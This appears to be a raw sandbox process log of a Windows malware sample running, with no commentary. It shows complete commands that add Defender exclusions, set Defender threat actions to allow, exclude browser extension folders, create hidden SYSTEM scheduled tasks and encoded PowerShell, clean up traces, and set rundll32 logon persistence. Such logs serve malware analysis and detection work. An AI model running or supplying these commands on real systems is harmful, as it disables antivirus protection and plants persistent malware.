"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bEtnHIcecDUtXwQuWS" /SC once /ST 05:16:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\RQPXR0N3\2WsCboUrj.exe\" z0 /gWdidO 757674 /S" /V1 /F
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
C:\Users\Admin\AppData\Local\Temp\RQPXR0N3\2WsCboUrj.exe
C:\Users\Admin\AppData\Local\Temp\RQPXR0N3\2WsCboUrj.exe z0 /gWdidO 757674 /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gfNaqWuZy" /SC once /ST 00:31:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gfNaqWuZy"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gfNaqWuZy"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "FPIEUdZLMYPzsiUNM" /SC once /ST 01:16:45 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe\" Wy /BGYZdidXU 757674 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "FPIEUdZLMYPzsiUNM"
C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe
C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\XPYXLum.exe Wy /BGYZdidXU 757674 /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1916 -ip 1916
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 936
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bEtnHIcecDUtXwQuWS"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\UQtSSXvqU\rBOWGj.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "OcPshDNvhDnVmSv" /V1 /F
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd200c3cb8,0x7ffd200c3cc8,0x7ffd200c3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1884,11669368734729869647,10261918272243514012,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1916 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1884,11669368734729869647,10261918272243514012,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1884,11669368734729869647,10261918272243514012,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2576 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,11669368734729869647,10261918272243514012,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,11669368734729869647,10261918272243514012,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
